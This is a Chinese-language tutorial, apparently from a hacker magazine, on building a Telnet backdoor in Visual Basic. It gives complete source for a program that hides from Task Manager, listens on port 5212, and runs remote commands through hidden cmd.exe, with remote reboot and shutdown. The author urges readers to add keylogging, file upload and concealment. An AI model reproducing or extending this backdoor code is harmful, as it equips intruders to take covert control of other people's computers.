vB编程之TELNET
对于TELNET后门的编写我们可通过VC来编写,网上也有很多的关于用VC编写TELNET后门的源码。但是看X档案的一定不少是喜欢VB来编写程序的。纵然编写TELNET后门不是VB的长项,但这不并难实现。偶没见网上有用VB编写TELNET后门的文章,所以我就写下了此文,确切的说,
这不是个真正后门,只是一个后门的基本模型,甚至可以说毛坯。BUG的修改,不足的修补,功能的扩充还需读者动手来实现。
首先,我们在大脑里想象出一个后门运行的过程或者把其大概的流程画出来,然后就按这个过程逐步来实现。好了,
下面就开始我们的后门编写之路。首先就是当程序运行时防止再一个程序的运行,实现代码如下:
Private Sub Form_Load()
syspath = systempath()
'防止多个程序运行
If App.PrevInstance Then
End
End If
cmdno = True
'使程序不在任务管理器中显示
App.TaskVisible = False
'监听端口5212
Winsock1.LocalPort = 5212
Winsock1.Listen
End Sub
其次,当telnet端请求连接时,服务端接受请求。(大家可以在此试着实现密码验证机制的实现,很简单,在此不再给出代码)
当TELNET连接时,触发ConnectionRequest事件,在这个事件中向控制端发送相应的成功连接和帮助信息。
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
If Winsock1.State <> sckClosed Then
Winsock1.Close
Winsock1.Accept requestID
Winsock1.SendData "------------------------backdoor v1.0-------------------------" & vbCrLf & _
Space(16) & "code by eighteen" & vbCrLf & "-------------------------------------------------------------" & _
vbCrLf & "type help to get help" & vbCrLf & "shell>"
End If
End Sub
当我们连接上时,就需要对TELNET发来的命令进行一系列的处理和执行,以及执行相关的控制功能。
其中的问题是服务端接受来自TELNET客户端的连接和命令,由于TELNET传输命令时只能每间次传输一个字符的特殊性,
所以我们需要编写一个处理命令的过程,这个不难实现。还有就是对特殊字符的过滤和处理,如TELNET输入错误按DEL键,
按ENTER键来完成一条命令的输入。当TELNET连上服务端时,实现shell功能,以及shell功能和其它功能的分离。
对其中的问题有了大概的了解,那实现起来也就不难了。代码如下:
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim str1 As String
Dim scmd As String
Dim i As Integer
Dim tag As Integer
Winsock1.GetData str1
'过滤del键盘,用来telnet命令输入错误处理.如果输入del键盘,则当前命令无效
If Asc(str1) = 8 Then
myname = "" '清空命令存储
Winsock1.SendData vbCrLf & "shell>"
End If
'检察当前一个命令的完整性和对命令输入错误的处理
If (Asc(str1) <> 13) And (Asc(str1) <> 8) Then
myname = myname + str1
Elseif Asc(str1) <> 8 Then
'测试时,查看接受的命令
Text1.Text = myname & vbcrlf
myname = "" '清空对当前命令的存储,用来接受下一条命令
'--------下面是对接受命令的处理
tag = InStr(Text1.Text, Chr(13)) - 1
scmd = Left(Text1.Text, tag)
'------------------------------
'判断是不是在虚拟shell中,不是则执行如下命令,否则执行虚拟shell命令语句
If cmdno = True Then
Select Case scmd
Case "help"
Winsock1.SendData "cmd -------打开shell" & vbCrLf & "reboot -------重启" & _
vbCrLf & "shutdown ------- 关机" & vbCrLf & "exit -------退出" & vbCrLf & "shell>"
Case "reboot"
ExitWindowsEx EXW_REBOOT, 0
Case "shutdown"
ExitWindowsEx EXW_SHUTDOWN, 0
Case "exit"
Winsock1.SendData "exit seccessful!"
Winsock1.Close
Winsock1.Listen
Case "cmd"
Winsock1.SendData "获得虚拟shell成功!" & vbCrLf & "vcmd>"
cmdno = False
Case Else
Winsock1.SendData "cammond error!" & vbCrLf & "shell>"
End Select
Else
Shell "cmd.exe /c" & Space(1) & scmd & Space(1) & ">" & syspath & "\shell.rlt&exit", vbHide
Sleep (500)
'调用执行结果发送过程
Call tranrlt
Winsock1.SendData "如果想退出虚拟shell,清输入exit" & vbCrLf & "vcmd>"
If scmd = "exit" Then
Winsock1.SendData "成功退出虚拟shell!" & vbCrLf & "shell>"
cmdno = True '重置虚拟shell标志
End If
End If
End If
End Sub
接下来要考滤的是,虚拟shell的实现,我用了一个简单的方法,就是把命令执行结果写入一个文本文档,然后读取其中的内
容并将结果发送给控制端。代码如下:
Sub tranrlt()
Dim strrlt As String
Open syspath & "\shell.rlt" For Input As #1
Do While Not EOF(1)
Line Input #1, strrlt
Winsock1.SendData strrlt & vbCrLf
Loop
Close #1
Winsock1.SendData "----------------------------------------------------" & vbCrLf
Shell "cmd.exe /c del " & syspath & "\shell.rlt&exit", vbHide
End Sub
至此,后门的主要问题都解决了,也许有的读者可以看出,这个后门模型存在问题。的确,这个后门模型并不完整,
所谓学而三思,思而后行,剩下的问题读者可以试着去解决。在此我不在给出源码。提示一下:
(1)如果TELNET不正常退出,服务端还会继续保存当前的会话,重新连接后失败。还有就是如何可以允许多人同时连接功能。
(2)读者可以加上密码验证机制,在此基础上扩大它的控制功能,如键盘记录,文件上传等。
(3)一个成功的后门,必然有一个好的隐藏和自我保护机制,所以,大家需要努力发挥自己的聪明和才智了。
以上只是个人愚见,不难实现。其实程序编写只有深入其中,动手实践,才会发现各种问题,而正是在这发现问题,解决问题的过程中,
你会学到更多,成功后的满足也更多。当我们苦苦思索解决一个问题或实现一种新方法和功能时,那种豁然开朗,
成功的喜悦会让你体会编程的乐趣。希望大家看完本文和在动手来完善它的时候,能学到些知识和技巧,那本文的目的也就达到了。
_____________--源码
Public syspath As String
Public cmdno As Boolean
Private Declare Sub Sleep Lib "kernel32" (ByVal nsecond As Long)
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Const EWX_REBOOT = 2
Const EWX_SHUTDOW = 1
Public myname As String
Sub tranrlt()
Dim strrlt As String
Open syspath & "\shell.rlt" For Input As #1
Do While Not EOF(1)
Line Input #1, strrlt
Winsock1.SendData strrlt & vbCrLf
Loop
Close #1
Winsock1.SendData "----------------------------------------------------" & vbCrLf
Shell "cmd.exe /c del " & syspath & "\shell.rlt&exit", vbHide
End Sub
Function systempath() As String
Dim filepath As String
Dim nSize As Long
filepath = String(255, 0)
nSize = GetSystemDirectory(filepath, 256)
filepath = Left(filepath, nSize)
systempath = filepath
End Function
Private Sub Form_Load()
syspath = systempath()
If App.PrevInstance Then
End
End If
cmdno = True
App.TaskVisible = False
Winsock1.LocalPort = 5212
Winsock1.Listen
End Sub
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
If Winsock1.State <> sckClosed Then
Winsock1.Close
Winsock1.Accept requestID
Winsock1.SendData "------------------------backdoor v1.0-------------------------" & vbCrLf & _
Space(16) & "code by eighteen" & vbCrLf & "-------------------------------------------------------------" & _
vbCrLf & "type help to get help" & vbCrLf & "shell>"
End If
End Sub
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim str1 As String
Dim scmd As String
Dim i As Integer
Dim tag As Integer
Winsock1.GetData str1
If Asc(str1) = 8 Then
myname = ""
Winsock1.SendData vbCrLf & "command error!" & vbCrLf & "shell>"
End If
If (Asc(str1) <> 13) And (Asc(str1) <> 8) Then
myname = myname + str1
ElseIf Asc(str1) <> 8 Then
Text1.Text = myname & vbCrLf
myname = ""
tag = InStr(Text1.Text, Chr(13)) - 1
scmd = Left(Text1.Text, tag)
If cmdno = True Then
Select Case scmd
Case "help"
Winsock1.SendData "cmd -------打开shell" & vbCrLf & "reboot -------重启" & _
vbCrLf & "shutdown ------- 关机" & vbCrLf & "exit -------退出" & vbCrLf & "shell>"
Case "reboot"
ExitWindowsEx EXW_REBOOT, 0
Case "shutdown"
ExitWindowsEx EXW_SHUTDOWN, 0
Case "exit"
Winsock1.SendData "exit seccessful!"
Winsock1.Close
Winsock1.Listen
Case "cmd"
Winsock1.SendData "获得虚拟shell成功!" & vbCrLf & "vcmd>"
cmdno = False
Case Else
Winsock1.SendData "command error!" & vbCrLf & "shell>"
End Select
Else
Shell "cmd.exe /c" & Space(1) & scmd & Space(1) & ">" & syspath & "\shell.rlt&exit", vbHide
Sleep (500)
Call tranrlt
Winsock1.SendData "如果想退出虚拟shell,清输入exit" & vbCrLf & "vcmd>"
If scmd = "exit" Then
Winsock1.SendData "成功退出虚拟shell!" & vbCrLf & "shell>"
cmdno = True
End If
End If
End If
End Sub
Private Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
Winsock1.Close
Winsock1.Listen
End Sub